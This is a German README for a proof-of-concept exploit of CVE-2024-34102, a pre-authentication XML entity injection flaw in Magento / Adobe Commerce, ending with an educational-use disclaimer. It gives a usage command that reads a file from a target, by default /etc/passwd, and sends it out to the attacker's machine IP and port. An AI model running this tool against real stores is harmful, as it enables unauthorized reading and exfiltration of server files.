
PoC für CVE-2024-34102. Eine XML-Entity-Injection-Schwachstelle vor der Authentifizierung in Magento / Adobe Commerce.
POC für CVE-2024-34102. Eine XML-Entity-Injection-Schwachstelle vor der Authentifizierung in Magento / Adobe Commerce.

Dieser POC versucht, Dateien von Zielhosts zu lesen, die anfällig für die aktuelle Magento / Adobe Commerce CVE-2024-34102 sind. Dieser POC basiert auf dieser Sicherheitswarnung und dieser Forschung von Assetnote.
Um diesen POC auszuführen, benötigen Sie einen Rechner mit einer veröffentlichten und erreichbaren IP-Adresse.
poc.xml, die die Hauptpayloads enthält./etc/passwd).requests-BibliothekSo verwenden Sie diesen POC gegen ein einzelnes Ziel:
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
Bei Anregungen oder Fragen kontaktieren Sie mich bitte unter meinem Profil.
Dieses bereitgestellte Tool dient ausschließlich Bildungszwecken. Ich befürworte, unterstütze oder toleriere keinen unbefugten Zugriff auf Systeme oder Netzwerke. Verwenden Sie dieses Tool verantwortungsbewusst und nur auf Systemen, für die Sie ausdrückliche Erlaubnis zum Testen haben. Jegliche Handlungen und Konsequenzen, die aus dem Missbrauch dieses Tools resultieren, liegen in Ihrer eigenen Verantwortung.